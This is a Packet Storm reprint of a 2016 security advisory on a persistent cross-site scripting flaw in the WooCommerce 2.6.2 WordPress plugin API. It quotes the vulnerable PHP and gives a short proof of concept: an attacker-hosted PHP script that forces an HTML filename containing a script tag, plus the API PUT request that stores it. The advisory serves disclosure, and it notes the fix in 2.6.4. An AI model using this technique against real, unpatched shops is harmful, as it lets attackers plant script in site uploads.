exploit the possibilities

WordPress Woocommerce 2.6.2 API Cross Site Scripting

WordPress Woocommerce 2.6.2 API Cross Site Scripting
Posted Sep 10, 2016
Authored by Securify B.V., Sipke Mellema

WordPress Woocommerce version 2.6.2 suffers from an API related cross site scripting vulnerability.

tags | exploit, xss
MD5 | c37b485881fa1b91c27088e2d7717d70

WordPress Woocommerce 2.6.2 API Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Woocommerce WordPress plugin
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A vulnerability exists in the Woocommerce API that allows for the
creation of malicious HTML files when an image is downloaded from an
attacker controlled URL.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160719-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Woocommerce version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Woocommerce version 2.6.4.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html

The vulnerability exists in multiple places in the code. This description will use the code located at:
/includes/api/legacy/v3/class-wc-api-products.php
The vulnerable method is called upload_image_from_url. This method is used for adding product and product category images from a URL. wp_check_filetype is used to retrieve a file type for the filename in the URL.

$wp_filetype = wp_check_filetype( $file_name, null );

wp_check_filetype checks if the file extension matches the array of extensions returned by wp_get_mime_types. wp_get_mime_types returns a big list of file types, including HTML and most image files. It does not include the PHP file extension.

If the file type cannot be determined by wp_check_filetype from the URL (for example, if the URL ends with .php), the code will retrieve the file from the server headers.

// Ensure we have a file name and type.
if ( ! $wp_filetype['type'] ) {
$headers = wp_remote_retrieve_headers( $response );
if ( isset( $headers['content-disposition'] ) && strstr( $headers['content-disposition'], 'filename=' ) ) {
$disposition = end( explode( 'filename=', $headers['content-disposition'] ) );
$disposition = sanitize_file_name( $disposition );
$file_name = $disposition;
} elseif ( isset( $headers['content-type'] ) && strstr( $headers['content-type'], 'image/' ) ) {
$file_name = 'image.' . str_replace( 'image/', '', $headers['content-type'] );
}


The server now has control over the file name by setting the content-disposition header or by setting the content-type header to something like image/html. PHP files can not be created because the method wp_upload_bits will be called on the new file name, and the extension of the new file name must be included in the array returned by wp_get_mime_types.

Other files that contain the vulnerable code pattern are:
/woocommerce/includes/wc-rest-functions.php
/woocommerce/includes/cli/class-wc-cli-product.php
/woocommerce/includes/api/legacy/v3/class-wc-api-products.php
/woocommerce/includes/api/legacy/v2/class-wc-api-products.php

Because WordPress includes itself in the User Agent header when requesting the image, it's possible to an attacker to show images for normal users and to inject HTML files when the Woocommerce API does a request.

HTML files will not be included as a category image but will show up in the media library.
Proof of concept


This attack can be done when the called URL does not end in a file type included in wp_get_mime_types. For example, in the case where a popular image is shown by a PHP script.

On an external server, create a file called image.php with the following content:

<?php
header("content-disposition: filename=poc.html");
echo "<script>alert(1)</script>";
?>

Now perform a PUT request to:

/wc-api/v3/products/categories/<valid id>?consumer_key=<key>&consumer_secret=<secret>

With the JSON content:

{"product_category":{"image":"http://<external server>/image.php"}}

The category image will be empty, and a file poc.html will appear in the upload folder.


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close